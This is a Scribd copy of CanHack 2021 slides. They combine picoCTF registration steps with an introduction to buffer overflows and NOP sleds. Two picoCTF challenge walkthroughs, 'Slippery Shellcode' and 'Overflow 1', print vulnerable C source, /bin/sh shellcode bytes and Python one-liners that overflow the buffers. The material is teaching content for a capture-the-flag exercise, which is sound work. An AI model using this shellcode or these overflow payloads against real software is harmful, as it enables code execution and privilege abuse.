Scribd
Upload
36 views21 pages

Binary Exploitation 201

The document provides a guide for teachers and students on how to register for the CanHack 2021 event and participate in the picoCTF competition. It includes steps for creating classrooms, assigning students, and understanding binary exploitation concepts such as buffer overflows and NOP sleds. Additionally, it outlines mitigation strategies against buffer overflow attacks and provides resources for further learning.

Uploaded by

mumiklp1
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
36 views21 pages

Binary Exploitation 201

The document provides a guide for teachers and students on how to register for the CanHack 2021 event and participate in the picoCTF competition. It includes steps for creating classrooms, assigning students, and understanding binary exploitation concepts such as buffer overflows and NOP sleds. Additionally, it outlines mitigation strategies against buffer overflow attacks and provides resources for further learning.

Uploaded by

mumiklp1
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 21

Binary

Exploitation
201

CanHack 2021 February 17, 2020


PicoCTF Registration - For teachers/supervisors

Step 1: Register first for CanHack as a Supervisor at DMZ.to/canhack if not


already done so.

Step 2: After registering for a picoCTF account, log in to your account and
register for CanHack 2021 event as a teacher.
PicoCTF Registration - For teachers/supervisors

Step 3: There are TWO METHODS to assign students to classrooms

Go to Classroom Menu, Management Tab and create a new classroom.

Method 1: Select “Batch Register Users”, this open will generate accounts (usernames,
passwords) for the number of students you specify. The usernames can then be shared
with your students and they can use this information to login.

Method 2: Students can create their own usernames and you can share an invite code
with them to join your classroom.
PicoCTF Registration - For teachers/supervisors

Step 4: Collect all usernames and teams that your students will be using on the PicoCTF
platform and fill out this excel template here: This template will have all the team names
and the corresponding student's usernames.

Step 5: Upload the excel sheet with the team names and usernames.

The link to do this can be found here:


https://forms.gle/vFsxqavVx85DKkig9
PicoCTF Registration - For students

Step 1: After registering for a picoCTF account, log in to your account and register for CanHack
2021 event as a student. If your teacher will be providing the usernames use the username and
temporary password provided and update it.

Step 2: Once you have decided on the team you will join, allocate one teammate to create the
team on the picoCTF platform. Under the profile section, students should see the team
management section. ONE student from the team should create the desired team name and
password.

Step 3: Once the team is created, other students can then go on their own profiles and sign into
that team as well. (Once a team is joined you cannot leave the team or join another)

Step 4: Teams should inform their teachers, parents or supervisors of the usernames, and team
names so their teacher, parent or supervisor can complete Step 4 above.
What is Binary Exploitation

Binary exploitation involves taking advantage of a bug or vulnerability in


order to cause unintended or unanticipated behaviour in the program.

Memory corruption is a common form of challenges seen in the Binary


Exploitation category
Buffer Overflows
● Violation of memory security
● A buffer is a specific area of memory that an application has access to, to hold
temporary data
● When an application receives more input than it expects a buffer overflow occurs
● Buffer overflows allow access to memory locations beyond the applications buffer
resulting in the program crashing
● This enables an attacker to inject their malicious code into this area of memory

8 bytes

P A S S W O R D 1 2

0 1 2 3 4 5 6 7 8 9
Buffer Overflow Continued..
● If an attacker understands how memory and binary works then they can craft a
code that can be interpreted by the computer and executed
● If it overflows into an instruction, the computer might begin executing it
● Many programs that are written in C, C++ and in other languages are susceptible
to these attacks
● They lack built-in protection against accessing data anywhere in memory space
● Don’t automatically check whether inputted data is within its bounds
Dangerous C functions
1. strcpy (does not specify a maximum length while copying)
2. strncpy
3. strcat
4. printf
5. sprint (format string vulnerability)
6. scanf
7. fgets
8. gets
9. getws
10. memcpy
11. memmove
Attacker has
overwritten the return
address, which now
goes to the location
specified and
executes the
attackers code

Source: Wikipedia
NOP Sled

● NOP means “No Operation”


● It is hard to find the exact location in memory of the pointer, one technique
that is used is NOP
● Many Intel processors use 0x90 as a NOP command
● A string of 0x90 is known as a NOP sled
● Attackers abuse the NOP by inputting a NOP sled followed by malicious code
● The CPU ignores the NOP sled until it gets to the last one and executes the
code in the next instruction (ie. the malicious code)
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h> We input the shellcode and
#include <sys/types.h>
execute vuln
#define BUFSIZE 512
#define FLAGSIZE 128
Vuln puts the shellcode into the
void vuln(char *buf){
gets(buf); buffer
puts(buf);
}
Buffer is executed with the
int main(int argc, char **argv){
function pointer with an offset
setvbuf(stdout, NULL, _IONBF, 0);
added
// Set the gid to the effective gid

Slippery Shellcode // this prevents /bin/sh from dropping the privileges


gid_t gid = getegid();
setresgid(gid, gid, gid);

char buf[BUFSIZE];

puts("Enter your shellcode:");


vuln(buf);

puts("Thanks! Executing from a random location now...");

int offset = (rand() % 256) + 1; We need a way that doesn’t


((void (*)())(buf+offset))(); matter where it lands that it
executes our shellcode
puts("Finishing Executing Shellcode. Exiting now...");

return 0;
}
Shell code

\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x
0b\xcd\x80\x31\xc0\x40\xcd\x80
Slippery Shellcode Solution

Write a program to print out NOP so it overrides the offset and executes the
shellcode

(python -c "print '\x90' *256 +


'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb
0\x0b\xcd\x80\x31\xc0\x40\xcd\x80'" ; cat) | ./vuln
GDB- The GNU debugger

DB, the GNU Project debugger, allows you to see what is going on `inside' another program while it
executes -- or what another program was doing at the moment it crashed.

GDB can do four main kinds of things (plus other things in support of these) to help you catch bugs in the
act:

● Start your program, specifying anything that might affect its behavior.
● Make your program stop on specified conditions.
● Examine what has happened, when your program has stopped.
● Change things in your program, so you can experiment with correcting the effects of one bug and go
on to learn about another.

Source: https://www.gnu.org/software/gdb/
GDB commands

● type ‘gdb’ to start GDB.


● type quit or Ctrl-d to exit.

Full syntax here.

GDB with modular interface


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h> Function called flag which prints out
#include <sys/types.h>
#include "asm.h" flag.txt
#define BUFFSIZE 64
#define FLAGSIZE 64 Vuln function is running gets (which
void flag() { is a function with a lot of security
char buf[FLAGSIZE];
FILE *f = fopen("flag.txt","r"); flaws)
if (f == NULL) {
printf("Flag File is Missing. please contact an Admin if you are running this on the shell server.\n");
exit(0);
}

Overflow 1 }
fgets(buf,FLAGSIZE,f);
printf(buf);
Setvbuff - Buffer is set up

void vuln(){ Privileges are raised so we can read


char buf[BUFFSIZE];
gets(buf);
the flag
printf("Woah, were jumping to 0x%x !\n", get_return_address());
}

int main(int argc, char **argv){

setvbuf(stdout, NULL, _IONBF, 0);


gid_t gid = getegid(); Runs vulnerable function, which will
setresgid(gid, gid, gid);
puts("Give me a string and lets see what happens: "); show us the address it’s jumped to
vuln();
return 0;
}
Overflow 1 Solution
Trial and error to see how many characters are needed to override the jump
address to the address we provide

(python -c "print 'A'*76+'\xe6\x85\x04\x08'") | ./vuln


Mitigation against Buffer Overflow attacks

● IDS/IPS
● Secure code (boundary checking,
input validation)
● Canary
● Mark areas of memory as NX/XD
(No execution/execute disable),
processor will not execute any code
residing in any of these areas
Resources
https://dmz.ryerson.ca/canhack-resource-hub

https://owasp.org/www-community/vulnerabilities/Buffer_Overflow

https://www.tenouk.com/Bufferoverflowc/Bufferoverflow2a.html

https://www.exploit-db.com/docs/english/13019-shell-code-for-beginners.pdf

https://github.com/Gallopsled/pwntools

https://tcode2k16.github.io/blog/posts/picoctf-2019-writeup/binary-exploitation/#solution

https://ctf.samsongama.com/ctf/index.html
Thank You

Questions?

● Ensure you are registered for picoCTF 2021.


● Hacking the All-Female Prize: CanHack Cybersecurity
Webinar for Girls
● CanHack launch event on Monday March 15 is
mandatory

You might also like